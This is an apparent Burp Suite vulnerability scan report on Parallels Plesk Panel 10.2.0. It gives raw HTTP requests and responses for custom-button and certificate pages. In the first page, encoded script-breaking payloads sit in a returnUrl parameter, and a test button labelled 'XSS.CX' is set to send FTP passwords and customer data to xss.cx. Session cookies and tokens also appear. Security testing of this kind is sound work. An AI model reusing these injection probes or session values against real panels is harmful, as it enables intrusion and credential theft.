<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fcustom-buttons%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController7bea8%25253c%25252fScRiPt%252520%25253ef9cde00af98' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Links to additional services","href":"\/plesk\/client@2\/custom-buttons\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@3/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="XSS.CX" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="http://xss.cx" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" CHECKED > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" CHECKED > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" CHECKED > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" CHECKED > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" CHECKED > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" CHECKED > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" CHECKED > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" CHECKED > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10">will it take xss?</TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="3">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

9.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@new/properties/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/client@2/custom-buttons/custom-button@new/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:19:08 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:19:08 GMT
Connection: close
Content-Length: 18025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/wizard.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController%2500da28a%3C%2Fscript%3Eda6245b28ac' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@new/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10"></TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="0">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-finish" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply the changes made on this screen and exit the wizard.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);document.forms[0].wizaction.value=&quot;finish&quot;; return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_finish" id="buttonid-finish" type="submit" onClick="Event.stop(event);document.forms[0].wizaction.value=&quot;finish&quot;; return update_oC(document.forms[0]);;return false;">Finish</BUTTON><SPAN id="spanid-finish">Finish</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizstep" value="1"><input type="hidden" name="wizard" value="/plesk/client@2/custom-buttons/custom-button@new/properties/"><input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

9.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/certificate@

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/certificate@

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/client@2/domain@1/certificate@ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:39 GMT
Connection: close
Content-Length: 19232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
